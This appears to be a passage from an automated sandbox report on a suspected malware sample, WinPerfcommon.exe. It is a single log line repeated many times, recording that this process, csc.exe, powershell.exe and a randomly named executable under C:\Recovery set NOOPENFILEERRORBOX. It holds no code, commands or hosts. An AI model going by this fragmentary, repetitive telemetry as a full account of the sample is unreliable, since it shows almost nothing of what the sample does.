                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
